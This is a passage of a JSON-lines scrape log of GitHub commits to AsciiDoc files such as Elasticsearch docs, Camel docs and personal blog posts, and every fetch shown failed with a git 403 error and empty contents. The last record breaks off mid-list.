ile":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf586fc32ec593c31f09bb9b1ee81feec37e49c6","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa6a7e7ef210af2cf19bcd9c0bba9db713cade73","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe6555b7abe4a36cea243d4d599f1355621752d","subject":"Docs: your -> you're (#20883)","message":"Docs: your -> you're (#20883)\n\n","repos":"vroyer\/elasticassandra,mohit\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,gmarz\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,spiegela\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,JervyShi\/elasticsearch,JervyShi\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,glefloch\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,gmarz\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,henakamaMSFT\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,yanjunh\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,liweinan0423\/elasticsearch,bawse\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,ZTE-PaaS\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,bawse\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,wuranbo\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,yanjunh\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,njlawton\/elasticsearch,fforbeck\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,gmarz\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,JervyShi\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,fforbeck\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,gmarz\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,yanjunh\/elasticsearch,fforbeck\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,nilabhsagar\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,vroyer\/elassandra,MaineC\/elasticsearch,rajanm\/elasticsearch,JervyShi\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/children-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/children-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e425951707fefb13a6ace267872acb6f1a545c1","subject":"y2b create post SMS Audio STREET by 50 DJ Headphones Unboxing \\u0026 Overview","message":"y2b create post SMS Audio STREET by 50 DJ Headphones Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-14-SMS-Audio-STREET-by-50-DJ-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-02-14-SMS-Audio-STREET-by-50-DJ-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"863aef49713db2d3a813bc33365498acfb7ae76c","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"390766513d9ee6fead357f1e309a9e094620cf38","subject":"Updating the documentation","message":"Updating the documentation\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1849090 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f751cc726ae00cb78b8b81823de49b8409e0b713","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebfadcaf98ebac495af55ff6c2bca1ef917dda6d","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5102570eff88a08e35b5fd918e76e8d0637a3a05","subject":"Update 2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","message":"Update 2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","new_file":"_posts\/2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09686289404ad79a4287daf17d0a0ac7f120314c","subject":"Update 2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","message":"Update 2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","new_file":"_posts\/2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556d4b1fda83f0dec733245afb3412fb7fa3793d","subject":"Update 2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","message":"Update 2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","new_file":"_posts\/2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00df8d998bc1e50952cbfcb03ebbf412b70be705","subject":"Converted to ascii doc","message":"Converted to ascii doc\n","repos":"skazi-pivotal\/Dev101,skazi-pivotal\/Dev101","old_file":"Labs\/lab_01.adoc","new_file":"Labs\/lab_01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skazi-pivotal\/Dev101.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8ccf5ffd1cc031b0ec8c47326140005a455450d","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfdac174eee22a259ff7951ec032439cb051e3fd","subject":"y2b create post This Tiny Gadget Will Change Your Voice!","message":"y2b create post This Tiny Gadget Will Change Your Voice!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-29-This-Tiny-Gadget-Will-Change-Your-Voice.adoc","new_file":"_posts\/2016-08-29-This-Tiny-Gadget-Will-Change-Your-Voice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2242fd5c716d4a6c3830d0f0bed1e6c83b2dba52","subject":"Proposed an editing workflow","message":"Proposed an editing workflow\n\nI have tried this process and it works well, but the original instruction set left a few too many questions.\r\nI've proposed a workflow that folks can use to continue using draw.io.","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4418bbc0bfb0e07f995f218bdf24f5d597c651b","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ef74b276f16ae142c17998909d728fab17ddf99","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e59f56068cb0f241c4a6015265a6aa5e2062e157","subject":"formating section titles","message":"formating section titles","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bebe13720d0aad89852a5e3bd48037ba44299ec3","subject":"Update 2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","message":"Update 2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","repos":"tkountis\/tkountis.github.io,tkountis\/tkountis.github.io,tkountis\/tkountis.github.io,tkountis\/tkountis.github.io","old_file":"_posts\/2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","new_file":"_posts\/2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tkountis\/tkountis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f145596ce3d0513c99490787bef1f2efc966cf6","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00cd4635415b1c0233a0e68c7eecba9f3ec8dbc7","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d7ce68a3372599121f206fb3127e538f3b84b8a","subject":"Added camel-stringtemplate docs to Gitbook","message":"Added camel-stringtemplate docs to Gitbook\n","repos":"anoordover\/camel,Thopap\/camel,tkopczynski\/camel,gautric\/camel,drsquidop\/camel,mgyongyosi\/camel,drsquidop\/camel,ssharma\/camel,dmvolod\/camel,neoramon\/camel,akhettar\/camel,nicolaferraro\/camel,oalles\/camel,sabre1041\/camel,jamesnetherton\/camel,objectiser\/camel,dmvolod\/camel,lburgazzoli\/camel,DariusX\/camel,mgyongyosi\/camel,lburgazzoli\/camel,acartapanis\/camel,snurmine\/camel,sabre1041\/camel,yuruki\/camel,allancth\/camel,nikvaessen\/camel,hqstevenson\/camel,prashant2402\/camel,rmarting\/camel,davidkarlsen\/camel,yuruki\/camel,sverkera\/camel,gautric\/camel,mcollovati\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,FingolfinTEK\/camel,curso007\/camel,jmandawg\/camel,hqstevenson\/camel,RohanHart\/camel,kevinearls\/camel,gnodet\/camel,oalles\/camel,hqstevenson\/camel,jarst\/camel,YoshikiHigo\/camel,kevinearls\/camel,salikjan\/camel,lburgazzoli\/apache-camel,jmandawg\/camel,yuruki\/camel,veithen\/camel,tkopczynski\/camel,tdiesler\/camel,ullgren\/camel,isavin\/camel,cunningt\/camel,JYBESSON\/camel,akhettar\/camel,veithen\/camel,neoramon\/camel,RohanHart\/camel,drsquidop\/camel,tadayosi\/camel,isavin\/camel,neoramon\/camel,ssharma\/camel,nboukhed\/camel,kevinearls\/camel,NickCis\/camel,bgaudaen\/camel,gautric\/camel,nikvaessen\/camel,hqstevenson\/camel,ssharma\/camel,jlpedrosa\/camel,sirlatrom\/camel,Fabryprog\/camel,nboukhed\/camel,rmarting\/camel,kevinearls\/camel,kevinearls\/camel,objectiser\/camel,onders86\/camel,chirino\/camel,mgyongyosi\/camel,jamesnetherton\/camel,tadayosi\/camel,RohanHart\/camel,apache\/camel,pkletsko\/camel,bhaveshdt\/camel,nboukhed\/camel,veithen\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,gautric\/camel,scranton\/camel,DariusX\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,sverkera\/camel,yuruki\/camel,allancth\/camel,gnodet\/camel,cunningt\/camel,acartapanis\/camel,w4tson\/camel,pkletsko\/camel,tlehoux\/camel,gautric\/camel,jlpedrosa\/camel,zregvart\/camel,jonmcewen\/camel,borcsokj\/camel,FingolfinTEK\/camel,DariusX\/camel,oalles\/camel,sverkera\/camel,objectiser\/camel,pmoerenhout\/camel,veithen\/camel,ullgren\/camel,gilfernandes\/camel,mgyongyosi\/camel,w4tson\/camel,scranton\/camel,christophd\/camel,onders86\/camel,anton-k11\/camel,hqstevenson\/camel,tlehoux\/camel,zregvart\/camel,nikvaessen\/camel,anoordover\/camel,lburgazzoli\/camel,adessaigne\/camel,bhaveshdt\/camel,jmandawg\/camel,tdiesler\/camel,apache\/camel,rmarting\/camel,adessaigne\/camel,jmandawg\/camel,bhaveshdt\/camel,nikvaessen\/camel,Fabryprog\/camel,dmvolod\/camel,kevinearls\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jarst\/camel,NickCis\/camel,onders86\/camel,jonmcewen\/camel,sirlatrom\/camel,driseley\/camel,tlehoux\/camel,tdiesler\/camel,ssharma\/camel,tkopczynski\/camel,snurmine\/camel,christophd\/camel,jmandawg\/camel,prashant2402\/camel,pkletsko\/camel,gilfernandes\/camel,anton-k11\/camel,Thopap\/camel,jamesnetherton\/camel,hqstevenson\/camel,borcsokj\/camel,davidkarlsen\/camel,JYBESSON\/camel,bgaudaen\/camel,RohanHart\/camel,cunningt\/camel,bhaveshdt\/camel,FingolfinTEK\/camel,christophd\/camel,alvinkwekel\/camel,jmandawg\/camel,mgyongyosi\/camel,ssharma\/camel,nboukhed\/camel,prashant2402\/camel,curso007\/camel,scranton\/camel,driseley\/camel,snurmine\/camel,yuruki\/camel,driseley\/camel,YoshikiHigo\/camel,jamesnetherton\/camel,bgaudaen\/camel,nboukhed\/camel,scranton\/camel,chirino\/camel,drsquidop\/camel,pmoerenhout\/camel,jlpedrosa\/camel,acartapanis\/camel,tadayosi\/camel,chirino\/camel,driseley\/camel,nikvaessen\/camel,FingolfinTEK\/camel,gautric\/camel,CodeSmell\/camel,pkletsko\/camel,curso007\/camel,nikhilvibhav\/camel,sverkera\/camel,jarst\/camel,NickCis\/camel,christophd\/camel,sirlatrom\/camel,borcsokj\/camel,w4tson\/camel,jkorab\/camel,adessaigne\/camel,acartapanis\/camel,pkletsko\/camel,Thopap\/came